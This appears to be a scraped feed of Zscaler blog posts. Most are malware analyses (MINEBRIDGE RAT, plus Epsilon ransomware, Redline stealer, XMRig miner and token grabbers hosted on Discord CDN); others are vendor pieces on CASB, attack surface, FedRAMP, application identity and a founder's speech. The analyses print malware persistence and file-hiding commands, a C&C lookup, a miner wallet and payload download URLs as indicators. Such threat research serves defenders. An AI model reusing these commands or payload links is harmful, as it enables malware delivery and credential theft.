RAT creates a LNK file with the name “Windows Logon.lnk” in the startup directory. The LNK file points to the currently executing binary with icon same as “wlrmdr.exe” and description as “Windows Logon”. Figure 10: LNK file properties showing target path and Icon source C&C communication MINEBRIDGE RAT supports the following C&C commands: ● drun_command ● rundll_command ● update_command ● restart_command ● terminate_command ● kill_command ● poweroff_command ● reboot_command ● Setinterval_command At the time of analysis, we didn’t receive any active response from the C2 server. However, based on the code flow, the communication mechanism seems to be the same as previously reported attack instances. Detailed analysis of C2 communication can be found in this report. Alternate attack flow The MINEBRIDGE RAT DLL also has the support to be executed via regsvr32.exe. The malicious code is present inside the DllRegisterServer export. When executed via regsvr32.exe or rundll32.exe, the DllMain routine won’t perform any actions but regsvr32.exe also calls DllRegisterServer export implicitly and, hence, the malicious code inside DllRegisterServer export gets executed. Interestingly, the check at the very beginning of the code inside DllRegisterServer export verifies that the process name is regsvr32.exe and only then executes the code further. We didn’t see this code path using regsvr32.exe trigger in the current attack instance but it fits with what has been reported in earlier instances from FireEye and the advisory report with a few changes in filenames and payload directory. Figure 11: Payload download from DllRegisterServer export Zscaler Cloud Sandbox report Figure 12 shows the sandbox detection for the macro-based document used in the attack. Figure 12: Zscaler Cloud Sandbox detection In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels. Win32.Backdoor.MINEBRIDGE VBA.Downloader.MINEBRIDGE MITRE ATT&CK TTP Mapping ID Tactic Technique T1566.001 Spearphishing Attachment Uses doc based attachments with VBA macro T1204.002 User Execution: Malicious File User opens the document file and enables the VBA macro T1547.001 Registry Run Keys / Startup Folder Creates LNK file in the startup folder for payload execution T1140 Deobfuscate/Decode Files or Information Strings and other data are obfuscated in the payloads T1036.005 Masquerading: Match Legitimate Name or Location File name used similar to legit Windows Defender binary T1027.002 Obfuscated Files or Information: Software Packing Payloads are packed in layers T1574.002 Hijack Execution Flow: DLL Side-Loading Uses legit TeamViewer binary with dll-side loading vulnerability T1218 Signed Binary Proxy Execution Uses finger.exe for encoded payload download and certutil.exe to decode the payload T1056.002 Input Capture: GUI Input Capture Captures TeamViewer generated UsedID and Password by hooking GUI APIs T1057 Process Discovery Verifies the name of parent process T1082 System Information Discovery Gathers system OS version info T1033 System Owner/User Discovery Gathers currently logged in Username T1071.001 Application Layer Protocol: Web Protocols Uses https for C&C communication T1041 Exfiltration Over C&C Channel Data is exfiltrated using existing C2 channel Indicators of compromise Document hashes f95643710018c437754b8a11cc943348 41c8f361278188b77f96c868861c111e Filenames MarisaCV.doc RicardoITCV.doc Binary hashes 73b7b416d3e5b1ed0aa49bda20f7729a [SFX Archive] d12c80de0cf5459d96dfca4924f65144 [msi.dll] 59876020bb9b99e9de93f1dd2b14c7e7 [UPX packed MineBridge RAT] 23edc18075533a4bb79b7c4ef71ff314 [Unpacked MineBridge RAT] C&C domains // Below is a comprehensive list of C&C domains related to this threat actor Network paths // The network paths below are accessed by MineBridge RAT either using HTTP GET or POST requests /~4387gfoyusfh_gut/~3fog467wugrgfgd43r9.bin /~8f3g4yogufey8g7yfg/~dfb375y8ufg34gfyu.bin /~munhgy8fw6egydubh/9gh3yrubhdkgfby43.php User-agent: "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B150 Safari/604.1" Network data fetch using finger.exe // Format: username@ip_address nc20@ Downloaded files // Payloads are dropped in following paths %temp%/~f834ygf8yrubgfy4sd23.bin %temp%/~t62btc7rbg763vbywgr6734.bin %appdata%\vUCooUr1 %appdata%\vUCooUr.exe %programdata%\Local Tempary\defrender.exe %programdata%\Local Tempary\msi.dll %programdata%\Local Tempary\TeamViewer_Desktop.exe %programdata%\Local Tempary\TeamViewer_Resource_en.dll %programdata%\Local Tempary\TeamViewer_StaticRes.dll {STARTUP}\Windows Logon.lnk Exfiltrated user and system info // Format string uuid=%s&id=%s&pass=%s&username=%s&pcname=%s&osver=%s&timeout=%d The table below summarises the meaning of individual fields. Field name Purpose uuid BOT-ID of the user id TeamViewer ID of the user pass TeamViewer password username Currently logged in user name pcname Name of the computer osver Operating system version timeout Timeout between requests Tue, 23 Feb 2021 05:00:01 -0800 Sudeep Singh Will CASB Provide All the Security Your Agency Needs? Cloud access security brokers (CASBs) extend an agency’s security policy to third-party cloud services, providing visibility into the cloud services an agency uses and then building policies to control the usage of sanctioned versus unsanctioned cloud apps. That makes a CASB a critical cloud security tool. But is it enough on its own for the federal government’s data security needs? The answer is sometimes yes and sometimes no. Why? Because CASBs do not provide security protection features, such as (but not limited to) web content filtering and advanced threat protection. For that level of security, the CASB needs to be bundled with a secure web gateway (SWG). An SWG protects enterprises and users from cyberthreats while enforcing corporate policies. A cloud-delivered SWG may also implement functionalities found in CASB through its inherent deployment model—inline visibility provides protection and enforcement for cloud apps. It is imperative to determine if: CASB alone will meet your agency’s needs You need an SWG that includes CASB functionality, or You need to work with a CASB provider that partners with SWG vendors The first step is to look at the four implementation areas for CASB solutions in the market today: forward proxy, reverse proxy, out-of-band CASB, and log parsing. The next step is to look at how stand-alone CASB works with each. Stand-alone CASB does not support forward proxy There is no forward proxy service that exists as part of a platform to provide active blocking and protection. Some CASB providers partner with an SWG security vendor to integrate with the log parsing scenario. For example, Microsoft partners with Zscaler to provide the SWG for its Microsoft Cloud App Security (MCAS). In 2019, Zscaler was awarded the Microsoft Technology Partner of the Year in part because of the integration we built with MCAS. Stand-alone CASB does not support reverse proxy There is no reverse proxy capability as part of a CASB service. An SWG can enable this use case through the identity proxy functionality. This capability enables an agency to build policy from within the vendor’s app that prevents a user from signing on to a protected cloud application unless the traffic to the cloud application is sourced from the vendor. Stand-alone CASB does not support out-of-band CASB Out-of-band CASB is accomplished through an API-based approach for connecting to supported cloud app services and scanning content at rest, as well as through activity indicators associated with supported cloud apps. Blocking capabilities are subject to the limitations of the supported cloud service partners. That means only a subset of integrations may support the app functions. Stand-alone CASB and log parsing MCAS covers log parsing via the use of a log ingestion service. This is handled through one of the following approaches: A log connector VM in a Docker container in which web traffic logs are forwarded via syslog/CDF/etc. to the log connector VM An FTP ingestion service where logs are uploaded Manual log import through their web portal Log parsing only provides visibility into traffic violations (for example, users accessing an unsanctioned cloud app) and configuration of governance policies around which cloud apps are blocked. There is no actual blocking of the traffic (enforcement) function. A technician, such as a SOC resource, needs to perform that function manually to correlate cloud app usage and identify violations—based on the log data fed to the CASB—to a policy (block script) on a third-party traffic inspection device, such as a web content filter or firewall. There is no way to correlate and validate that a third-party device has all the blocks that are configured in the CASB without doing a manual audit. That enforcement/blocking function would need to be scripted manually if the CASB vendor does not have out-of-the-box integrations for third-party tools. Conclusion CASB is a fantastic tool that every federal agency should be using to make data more secure. However, it does not meet all of an agency’s security needs by itself. When sourcing a CASB solution, make sure your vendor of choice has an integrated SWG or is partnering with a provider that does. Download the full solution brief to see how Zscaler CASB can boost your agency's security. Thu, 04 Feb 2021 08:00:01 -0800 Matt Moulton A Resolution for 2021: More Focus on the Attack Surface The rise of successful ransomware attacks in 2020 speaks volumes: Companies have either lost sight of potential gateways for online attacks, or never had a handle on them in the first place. Hackers often use information listed publicly on corporate websites to obtain insights into an organisation’s network infrastructure and use this knowledge to their advantage when delivering attacks. Attackers simply collect all the clues—which are available in the public domain—and then install malware and steal confidential data. This year, all IT departments should set themselves a resolution: 2021 is the year to trace and minimise all attack vectors. From a security perspective it’s a well-known fact that companies expose more information about their infrastructure online than they should. An incorrectly configured service leaves traces on the web, while poorly secured development environments virtually invite attackers in, giving them access to shared meeting calendars, media files, and even routers—which can also expose data. Worse, hardware infrastructure connected to the internet makes it incredibly easy for attackers to find out more about the infrastructure of a company. A firewall, for example, might act as a boundary between the internal and external network—but in doing so, it can unintentionally give external parties insight into the company structure by openly publicising network names or domains used in internal environments. This kind of open-source intelligence (OSINT) on infrastructure hostnames, such as or, allows attackers to glean information about remote access services or VPN access in Europe. Resources with access restrictions, such as for live databases or for access portals, also allow hackers to collect information about companies online, and this information can then be used to determine potential points of entry for attack. This kind of data is freely available online—often without the affected company being aware of the risks involved. Hackers use this publicly accessible information to identify weaknesses and access points in the company network. Companies unaware of attack vectors There are many reasons why companies have lost sight of the potential attack surfaces hidden in plain sight within their own IT infrastructure. The exceptional circumstances of the past year have undoubtedly contributed to the fact that companies are publishing more information than necessary about their remote access infrastructure online. In 2020, companies were forced to rapidly make systems available to staff via remote access on a huge scale. But the problem cannot be attributed solely to the impact of the global health crisis; there are many other reasons why companies can easily lose sight of their IT infrastructure. Possible dangers include employees with responsibility for maintaining network assets leaving the company, outdated infrastructure components that are forgotten about and that no one has responsibility for, or a basic lack of processes and inventories for existing network components and online services. Risks can also arise from development environments, which are frequently less secure than production environments. The fact that virtually anyone can set up a service is also a threat. If the person setting up the service is not an expert, if the work is haphazard, or if responsibilities are not clearly defined, dangerous and uncontrolled proliferation online becomes the price for simplicity. Companies must understand that any online service could be visible to anyone. This means that any internet user could come knocking on the company’s online door and—if the security solutions in place are not adequate—cross the threshold into the network completely unquestioned. The right way to handle online expansion Putting information in the public domain and entering into a dialogue with others about it is part and parcel of using the internet. However, all services and assets must be protected with appropriate security measures. An online shopping website needs to be accessible to users, but it should not provide unnecessary access to information such as a customer database. The first decision that companies need to make when choosing their security solution is which information they wish to make available to everyone and which data should only be available to a restricted circle of users. The number-one priority when reducing gateways for an attack is to define security levels for different user groups. Drawing a distinction between internal and external target audiences can serve as the basic framework for categorisation. Internally, certain groups will need access to applications while the support team will need more comprehensive access rights. The administrators who manage the applications will also require enhanced rights. Access must be defined on a granular level. Externally, a distinction should be made between user scenarios involving customers or other third parties. For each user base, companies must develop a controlled security level based on granular segmentation, specific to the user group's needs. For companies, the challenge with this kind of setup lies in its complexity. Traditional segmentation techniques based on manual interaction increase the risk of errors. The zero trust principle for automated security can be a solution to this dilemma. Based on the user's identity and access rights, the system can isolate the services and data that the user needs. This principle can be deployed in cloud-based services and applications as well as in physical networks. By isolating and segmenting at the level of individual applications, the risk of attackers who manage to get into the system and manoeuvre their way laterally across the company network is eliminated. To pursue this segmentation concept, companies first need to do their homework and fully understand how their infrastructure is exposed online. Analysing attack gateways All services or hardware hosted online provide a potential attack surface. Companies must obtain a full picture of what is exposed online before they can put the necessary security in place. Tools that identify this open-source intelligence and highlight where action needs to be taken can be helpful in this process. Not everything that can be accessed online needs to be there, unsecured, and available to everyone. Only when a company understands its open attack vectors can it take action on security and establish appropriate segmentation and isolation rules for applications via a zero trust model. This will ensure that applications can only be accessed by authorised users—closing the doors to attackers. To learn about your attack surface, contact us for a internet attack surface analysis, which queries public sources to uncover the servers, namespaces, vulnerabilities, and cloud instances that are currently visible to the open internet. Additional resources: Learn how to prevent cloud misconfigurations automatically with Zscaler Cloud Security Posture Management (CSPM). Learn how Zscaler Workload Segmentation enables zero trust security to prevent lateral movement and stop threats. Read about the five attributes of the Zero Trust Exchange. Thu, 04 Feb 2021 05:00:01 -0800 Nathan Howe My Journey That Began at IIT (BHU) Yesterday, I had the distinct pleasure of addressing the graduates of my alma mater, the Indian Institute of Technology (BHU) in Varanasi. I’ve spoken to many audiences over the past decades about my personal history and perspectives on emerging technologies, security, entrepreneurship, and leadership, but this convocation address was truly special for me. (I invite you to view the video recording below.) The first time I arrived on the IIT campus to study electronics engineering was more than 40 years ago. It hadn’t been my idea to attend; I had been encouraged by my teachers who believed in my capabilities. The university shaped me in part due to the rigor of the work, but also due to the people I met who would become lifelong friends and colleagues. After graduating, I received a scholarship from the University of Cincinnati, where I earned an MS in Computer Engineering, an MS in Industrial Engineering, and an MBA in Marketing. In recent years, I have been honored by IIT (BHU) with two awards: Alumnus of the year (2015) and Alumnus of the Century in Making (2019). I am humbled by the recognition, and grateful for IIT’s invitation to speak to this year’s graduating class, allowing me to share important life lessons that began at IIT and helped shape my path forward. I had the opportunity to join great companies—IBM, NCR, and Unisys—and worked for 10 years in various technology roles, including engineering, sales, marketing, and management. It was at this time that internet adoption was beginning to skyrocket in the U.S. I was fascinated by the internet, as was every entrepreneur at the time, but my interest was different from the others I knew. This is where my first life lesson really emerged: Take risks and dream big. My family had no history of entrepreneurship. But in the mid-1990s, as the internet was just taking off and internet startups including Netscape had just gone public, I asked myself: Why can’t I do a startup? Instead of viewing the internet at the time as simply a vehicle for commerce, I saw an opportunity to help companies navigate the new security challenges they would face with internet technologies. After pitching my ideas to venture capitalists and failing to raise funding, my wife, Jyoti, and I made the decision to put our life savings into a startup we called SecureIT. I managed sales and marketing, and Jyoti managed finance, human resources, and company operations. As anyone who has started a company can attest, the hours are long and the strain on the family can be difficult. In that way, we were lucky, because Jyoti and I, with our complementary skills, were together 24 hours a day. In 1998, SecureIT was acquired by VeriSign, and most of its employees were able to reap the rewards of their hard work and dedication. The experience with SecureIT taught me a lot about my ambitions and the factors that truly motivated me. I was driven by the sense of accomplishment that came with bringing an idea to life. My advice to young entrepreneurs—to anyone—is to follow your passion. Engage in fulfilling work that boosts your energy instead of sapping it. My second life lesson and one of my favorite mantras is: Uncover your passion and pursue it. If you love what you do, you’ll never work a day in your life. My passion for building and executing fueled three more startups. One was an early SaaS provider, two were in security, and all three were eventually acquired. Even with the success of these companies, I remained driven by the desire to build something new. But as I looked to my next venture, I had a different purpose and I approached it with a changed mindset. I wanted to build something lasting. At the time, enterprises were starting to use the internet as something more than a communications medium. They were conducting business operations over the internet, using services such as Salesforce for CRM and Amazon EC2 for big data analytics and other compute-intensive work. The enterprises had invested heavily in security technologies that provided a secure perimeter around the network, but with more business traffic moving over the internet and more employees using mobile devices off the network, the traditional network security paradigm was on its way to becoming obsolete. About a decade after I graduated, I was at a conference in San Jose, California, and heard a voice that I recognized. It was actually the laugh of K. Kailash, my classmate at IIT (BHU), a brilliant computer scientist, and exactly the person who could help me realize my vision for transforming the security industry. Together, we started what would become Zscaler, the first cloud-native security-as-a-service provider. It was not easy to convince IT leaders that moving their security from the data center to the cloud would decrease risk, improve performance for users, and reduce costs and complexity. But those who saw the promise of cloud-delivered security also saw immediate benefits. Today, over 4,500 enterprises around the world trust Zscaler to help them securely transform their legacy network and security infrastructures for the modern, digital era. Starting Zscaler in 2007, launching our platform and serving customers starting in 2008, going public in 2018, growing to 2,500 employees in 2021, earning industry recognition year after year, and innovating every day—it’s all been the journey of a lifetime, and it all began at IIT. I encourage today’s graduates to consider these two life lessons as they forge their own paths: uncover your passion and pursue it, and take risks and dream big. Mon, 08 Feb 2021 08:00:01 -0800 Jay Chaudhry Discord CDN: A Popular Choice for Hosting Malicious Payloads Introduction Since the onset of the pandemic, the internet has become a central part of our lives. People of all ages turned online for school and work, to stream videos, to play video games, have virtual get-togethers, shop, talk to their doctor, and engage in any number of other activities. During 2020, research showed a sharp increase in game downloads, and this activity did not go unnoticed by cybercriminals. Attackers have often exploited the popularity of certain games (Among Us was a recent example) to lure players into downloading fake versions that served malware. Recently, the Zscaler ThreatLabZ team noticed new campaigns in which cybercriminals are targeting gamers. The key findings of our research include: Multiple campaigns relying on the service for their infection chain. Cybercriminals are using Discord CDN to host malicious files as well as for command-and-control (C&C) communication. Malicious files are renamed as pirated software or gaming software to trick gamers. File icons are also related to gaming software to trick gamers. Multiple categories of malware are being served through the Discord app’s CDN infrastructure - ransomware, stealers, and cryptominers. The attack usually starts with spam emails in which users are tricked with legitimate-looking templates into downloading next-stage payloads. It’s worth noting, however, that using Discord to host payloads is not new. This campaign uses Discord services to form a URL to host malicious payloads as follows: Figure 1: Malicious files blocked in the Zscaler cloud served via Technical Analysis Discord is a chat application that allows users to chat with each other in real time. Users can communicate with voice calls, chat messages, and video calls, and send files to one another. But attackers also use Discord, often to distribute malicious files and steal information. This CDN service was actually started as a content distribution network for serving static content to users, but it has revealed some considerable risks. For example, an attacker can upload a malicious file on a Discord channel and share its public link with others—even non-Discord users can download it. Worse, a file sent from Discord is there forever, so even if an attacker deletes a file within Discord, its link can still be used to download the malicious file. Figure 2: Infection chain of different malware on We have seen multiple payloads being used in recent campaigns, primarily consisting of these four: Epsilon ransomware Redline stealer XMRig miner Discord token grabbers Epsilon ransomware (MD5: f509bd9e1fbd7721c95d0d19ba317b03) We have analyzed the Epsilon ransomware loader in which execution starts with dropping an .inf file and .exe file in the Windows/Temp folder. The dropped payload performs the following actions upon execution. Figure 3: Payload functionality persistence() - Establishes persistence on the victim machine encryptionStage() - Encrypt files wallpap() - Download ransom image from Discord extract() - Download ransom note from Discord sapi() - Display ransom note x3() - Delete shadow copy(Recovery File) clearmem() - Clean Memory Exit() - Quit application The malware establishes persistence by creating the follow registry key on the victim's machine: Figure 4: Run key entry for persistence It will enumerate through the the system drives to encrypt the files using double encryption. First, it encrypts the files with AES encryption using a randomly generated 32-bit key. Then, those encrypted files will again be encrypted with the RC4 algorithm with a randomly generated 256-bit key. Figure 5: Searching drives for file encryption The custom AES algorithm using 256-bit encryption. Figure 6: Custom AES algorithm It also uses custom RC4 encryption that has a 2048-bit variable-length key, whereas actual RC4 encryption uses a 256-bit variable-length key. Figure 7: Custom RC4 algorithm It downloads the ransom note image from the link to show on the victim’s machine upon successful encryption. Figure 8: Downloading READ_ME.hta file The ransom note contains an email ID EpsilonCrypt@tutanota[.]com to communicate with the attacker for further information on payment and decryption key/software. There is no C&C used by this ransomware variant. Figure 9: Epsilon ransomware note with email ID to contact attacker The ransomware deletes the shadow copies as well as the catalog to prevent victim from recovering the original files which are now encrypted. Figure 10: Deleting shadow copy and catalog Redline stealer (MD5: 67A29EF483B6A9485269D5B15A900119) The next file we saw during our analysis is a Redline stealer. This stealer has been available on Russian underground forums since the first quarter of 2020 and is fairly new. It’s available as a standalone application and on a subscription basis with prices ranging from $100 to $300, depending upon the version and capabilities. We have seen multiple samples of the Redline stealer blocked in the Zscaler cloud sandbox and below is our analysis of a recent sample written in .NET. Redline Stealer Functionalities Collects login and passwords, cookies, autocomplete fields, credit cards Data collection from FTP clients, IM clients Customizable file-grabber based on path, extension Customizable to not work in a blacklisted country Collects information from the victim's machine: IP, country, city, current username, HWID, hardware information (video cards, processors), screenshot, screen resolution, keyboard layout, operating system, UAC settings, administrative privileges, user-agent, installed antiviruses Downloads file from the URL to a specified location on the victim's machine Process injection Download and execute the file Supports all browsers based on Chromium Supports all Gecko-based browsers Execution starts with dropping a copy of itself into the AppData/Roaming folder. Unpacked binary shows the author making use of several popular gaming application names for internal functions. Figure 11: Redline stealer .NET function names using popular gaming applications. The stealer is capable of collecting data form several FTP and IM clients installed on the victim's machine as seen below: Figure 12: Data collection from FTP clients, IM clients Figure 13 shows a module that is responsible for collecting information from browsers, such as stored cookies and credit card information. Figure 13: Stealing credit card info In addition to the functions to grab data from browser, FTP, and IM clients, the malware also steals victim's cryptocurrency wallet and collects victim's geolocation, hardware information, and Client IP address. SOAP over HTTP for C&C Redline stealer uses SOAP over HTTP for C&C communication. The malware is developed in .NET framework where the use of SOAP becomes very easy and also provides the additional advantage of being independent of an underlying protocol. Figure 14: Getting config setting from C&C All the data being collected according to configuration settings is sent back to the C&C server. Figure 15: Sending stolen client info After sending the collected data to the C&C server, the stealer is tasked with downloading and executing additional payloads based on the victim's machine information. Figure 16: Receiving a task from the C&C server The remote task action module is used to download and execute the files as instructed by the C&C server. Figure 17: Remote task action XMRig miner (MD5:41F5CF39159295CFECE4D6B37BEB2D6D) The next malware we have been seeing in this ongoing campaign is XMRig miner. The miner’s execution starts by dropping a copy of itself at %ProgramData%\RealtekHDUpdater\realtekdrv.exe. The malware also changes the file permissions using the following command: %ProgramData%\RealtekHDUpdater" & ATTRIB +h +s +r %ProgramData%\RealtekHDUpdater\cuda-helper.dll"& ATTRIB +h +s +r %ProgramData%\RealtekHDUpdater\nvrtc-builtins64_100.dll"& ATTRIB +h +s +r This is done to use the miner capabilities without user permissions. The malware connects to C&C server using the following command: Cmd open (class="de1">)(.*)(</div></li>).https://pastebin(.)com/VKRXfjxX, which yields Notice the usage of PasteBin URL to store the C&C server location. The malware then creates a scheduled task: /CREATE/SC MINUTE /MO 1/TN "Realtek Updater" The miner also tries to delete some programs that can be used to detect the miner or impact its efficiency, such as games. The following is the list of programs the miner tries to delete: Process Hacker, Task Manager, Windows, Windows Task Manager, AnVir Task Manager, Taskmgr.exe, taskmgr.exe, procexp64.exe, procexp32.exe, perfmon.exe, procmon.exe, csgo.exe, dota2.exe, RainbowSix_Vulkan.exe, RainbowSix.exe, FortniteClient-Win64-Shipping.exe, EscapeFromTarkov.exe, Rust.exe, VALORANT.exe, Overwatch.exe, gta_sa.exe, GTA5.exe, Radeon, NVIDIA GeForce After this, the miner is launched using the following Monero address: 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQswVtyKcWBsLoeY6A2 Discord token grabbers (MD5:5dd2400c3b6e3178eedde22c2427fda9) Cloud apps have become a mainstay for gamers just as they have for business and individual users. Cloud apps are great for interactivity, but they can also be leveraged for malicious attacks. The Discord token grabber is a broad term used to describe attacks that use Discord tokens to steal user information. In this case, the stealer uses Discord app to steal data from the user and send it to a predetermined C&C server. Below is the screenshot of token grabber code extracted from a recent payload: Figure 18: Stealer code Here, the program collects user information, for example, Environment.UserName, and sends it over using a webhook defined in the dcWebHook.WebHook variable. Figure 19: JSON response when the URI is visited TroubleGrabber (MD5: 2c178066d48d69dd56923343d338a376) This is a known stealer that uses Discord tokens to steal and send user data to its C&C. This stealer both spreads and communicates through Discord app, using Discord URLs for attachments like cdn[.]discordapp[.]com/attachments/[0-9]{18}/[0-9]{18}/Nameofattachment.rar. The name of the attachment can vary from being the name of a software application used by most users or cracked versions of games or tools, such as Discord Server Tool.exe, Galaxy Security Panel.exe, Vron Software.exe, CrackHub 2021.exe, or Vape V4 Cracked.exe. TroubleGrabber fetches payloads from https://github[.]com/Itroublve/Token-Browser-Password-Stealer-Creator to begin its next stage after being executed in the victim's machine. These files are as follows: https://cdn[.]discordappp[.]com/attachments/797230131218874430/797241057136869446/sendhookfile[.]exe[.]vbs https://cdn[.]discordapp[.]com/attachments/797230131218874430/797241059254992916/Token_Stealer[.]bat https://github[.]com/Itroublve/Token-Browser-Password-Stealer-Creator/raw/master/AVOID%20ME/WebBrowserPassView[.]exe https://github[.]com/Itroublve/Token-Browser-Password-Stealer-Creator/raw/master/AVOID%20ME/curl[.]exe Coverage The malware payloads observed in these campaigns were successfully blocked by the Zscaler Cloud Sandbox. Figure 20: Zscaler Cloud Sandbox report of Epsilon ransomware Figure 21: Zscaler Cloud Sandbox report of Redline stealer Figure 22: Zscaler Cloud Sandbox report of XMRig miner Detections: Win32.Ransom.Epsilon Win32.PWS.Redline Win32.Coinminer.Xmrig Win32.PWS.TroubleGrabber Conclusion Discord is primarily a chatting platform built for gamers and is becoming increasingly popular among other professional communities for sharing information. We’re observing an increase in the usage of the Discord app to deliver malicious files by attackers. Due to the static content distribution service, it is highly popular among threat actors to host malicious attachments that remain publicly accessible even after removing actual files from Discord. The Zscaler ThreatLabZ team will continue to monitor Discord-based malware campaigns to share the information with the community and to keep our customers safe. MITRE ATT&CK: ID Tactic Technique T1078 Valid Accounts It uses valid account to access email T1107 File Deletion Self delete T1204 User Execution User interaction T1268 Conduct social engineering Uses social eng to install payload T1489 Service Stop Stop critical services T1528 Steal Application Access Token Steal access token for valid account T1490 Inhibit System Recovery Delete shadow copies on a system T1222 File Directory Permissions Modification Change directory permission to hide its file T1555 Credentials from password store Steal stored password T1056 Keylogging Keylog of infected machine T1055 Process Injection Inject code into other process Indicators of Compromise MD5 Malware Name Malicious URLs / C&C f509bd9e1fbd7721c95d0d19ba317b03 Epsilon Ransomware https://cdn.discordapp[.]com/attachments/599226424695455755/800470210456846366/TaskHostHelper.exe 77d69cda0eebcd83f3a5e48d5f46a0d6 Epsilon Ransomware https://cdn.discordapp[.]com/attachments/599226424695455755/800087465523675176/65QEF.bmp 384c8470e59de327922bc5b8bc70c5f7 Epsilon Ransomware https://cdn.discordapp[.]com/attachments/599226424695455755/798932401216552974/READ_ME.hta efd0d1bd1e2bd38644a856707e0736ee Redline Stealer hxxps://cdn.discordapp[.]com/attachments/789938122951098380/791391319288184832/Outwith.exe 67a29ef483b6a9485269d5b15a900119 Redline Stealer https://cdn.discordapp[.]com/attachments/791427246031241270/797113668583948288/UpdaterMicrosoft.exe 4f5a53d149b343503c090601552468b1 XMRig Miner hxxp://cdn.discordapp[.]com/attachments/789938122951098380/791391327693832202/frost-miner-pro-v1.2.exe add4a9d06d21a044336462ff9871739f XMRig Miner hxxp://cdn.discordapp[.]com/attachments/553272395977195520/792811479073292298/crypted.exe 55c481a5eb77786ea4a12f8509301272 XMRig Miner hxxps://cdn.discordapp[.]com/attachments/553272395977195520/792811479073292298/crypted.exe b6d5b390d8248e95810e7af2e92faf5b XMRig Miner hxxps://cdn.discordapp[.]com/attachments/553272395977195520/797581786623901706/Summerset.exe 2c178066d48d69dd56923343d338a376 Trouble Grabber https://cdn.discordapp[.]com/attachments/799044673527611392/799045065116221490/Token_Stealer.bat 5dd2400c3b6e3178eedde22c2427fda9 Discord Token Grabbers http://207.32.216[.]211/peepee.exe Tue, 09 Feb 2021 15:17:50 -0800 Avinash Kumar FedRAMP JAB Certification at the High Impact Level: Another ZIA Milestone Today, on behalf of the entire team at Zscaler, I’m proud to share an important step forward in our commitment to help federal agencies take advantage of modern, cloud-based technology, securely. The FedRAMP Connect program announced that Zscaler Internet Access (ZIA) is prioritized for Joint Authorization Board (JAB) FedRAMP certification at the High Impact Level. ZIA, combined with Zscaler Private Access (JAB authorized at the High Impact Level) are the core of the Zscaler Zero Trust Exchange. The JAB selects an extremely limited number of providers for review each year – the primary criteria is government-wide demand for the solution. Zscaler’s selection underscores the value we are delivering to the 100+ federal agencies, Federal Systems Integrators (FSIs), and partners, and close to one million total users that we currently support; and widespread interest in and need for our solutions across the federal government. The FedRAMP Connect team shared they are “proud to see the scope and scale of innovation and infrastructure modernization that this next group of vendors represent for JAB authorizations.” In 2019, ZIA became the first cloud-based secure web gateway solution to earn FedRAMP certification. In 2020, Gartner recognized Zscaler as the only leader in its December 2020 Magic Quadrant for Secure Web Gateways. Today’s announcement underscores the Zscaler Zero Trust Exchange and Zscaler Advanced Cloud Sandbox as the industry model for the successful implementation of the Cybersecurity and Infrastructure Security Agency’s (CISA’s) Trusted Internet Connection (TIC) 3.0 guidelines, helping to keep civilian agencies and employees safe, productive, and focused on their mission. In 2020, ZPA achieved a FedRAMP JAB High authorization. A JAB High Baseline authorization for ZIA is a significant step forward, enabling Zscaler to offer more comprehensive solutions in the government marketplace, including Advanced Cloud Sandbox, Zscaler Digital Experience (ZDX), and Zscaler Cloud Connector. Certification at the High Impact level also enables Zscaler to support more customers in the Department of Defense (DoD) and Intelligence Community (IC) organizations. High Impact certification signals that the solution can protect government’s most sensitive, unclassified data in cloud environments, including data where loss of confidentiality, integrity, or availability may have a catastrophic effect on operations, assets, or individuals. This progress comes at a critical time. The past year intensified pressure on federal IT teams. The urgent need for secure federal IT transformation is front and center. We are proud to support our customers as they keep employees teleworking safely and productively, while enhancing efficiency with shared services. By providing them with a secure cloud foundation, we are enabling them to take advantage of emerging technologies— AI/machine learning, IoT, and 5G—and build a more innovative and secure future government. To read more about this important achievement for Zscaler, check out our press release here or visit our Zscaler for Government page. Tue, 02 Feb 2021 05:05:01 -0800 Stephen Kovac What is Application Identity and Why Does it Matter? Most security practitioners think in terms of protecting the “crown jewels,” whatever those may be relative to the specific business. While each company is different in terms of its resident data and applications or services, every company relies on data and applications/services to function. If those things are compromised in any way, the company is faced with repercussions (relative to the size of the compromise). Regardless of the magnitude of an incident, any time a security team needs to respond to one, it means the confidentiality, integrity, or availability of the data and/or systems has been called into question—in other words, some person or system resource has gained unauthorized access to the company’s “crown jewels.” And while at a theoretical level this quandary resonates with security practitioners, companies’ “crown jewels” continue to be secured using tools that sit far away from the assets themselves and that rely largely on network IP addresses, ports, and protocols that are easy for attackers to compromise. It’s important for security professionals to put the things they are tasked with protecting back at the center of their security strategy. The answer: application identity. Identifying apps/services by their attributes/characteristics/immutable properties allows security teams to build policies based on which applications and data are present, running, and communicating on the network. Doing so extracts security policy from the underlying network infrastructure and ties it directly to the “crown jewels.” The first key to application identity: Unchanging characteristics An application’s identity must be based considerably on immutable properties—properties an attacker cannot change—and cryptographic signatures of the application. An example of an unchanging property would be the SHA 256 hash of a binary. If a single bit of that binary changes, that hash is going to result in a different value. You're going to get a different identity. Other examples of unchanging characteristics include attributes like the universally unique identifier (UUID) of the system’s BIOS and serial numbers of the CPUs—things that are so fundamental to the system that an attacker cannot change them. The key to immutability is ensuring that the core characteristics of an application or service remain reliable enough to uniquely identify each app/service for verification in a zero trust environment without locking the app/service into where it can’t be upgraded, updated, or improved. The second key to application identity: Understandable characteristics One problem with using traditional security tools to protect applications on the network is translating “application speak” (how the app was written) into “network speak” (how security tools function). This mismatch has turned into a wrestling match between many development and security teams. To avoid such conflict, using understandable characteristics of applications to define them means that both security/networking and development/application teams can communicate in a common language. Oblique, opaque, or arbitrary characteristics erode confidence in their usefulness to function as identifiers. Using characteristics that make sense to the practitioner makes them more likely to trust and use the resulting application identity. What does “understandable” mean in practical terms? You might have an application, such as java.exe, where the actual process name represents the application running, but the java.exe binary itself, which might give you some specifics, could be used for multiple applications. One of the most critical things we use understandable traits for is to abstract and identify them against applications to practitioners, to security professionals, because most people who see a SHA 256, will have no idea what it is. On the other hand, if they see an application they're familiar with [such as java.exe], they will have a much better idea of what's going on on their network. The third key to application identity: A broad variety of characteristics As mentioned in “the first key,” an application’s identity must be based on a combination of many attributes, not just a smattering that could potentially be used to identify multiple applications. Identifying an application based on a large collection of attributes means that some parts of the identity can change (for example, through software updates) without changing the overall fingerprint of the application. This would be akin to identifying a 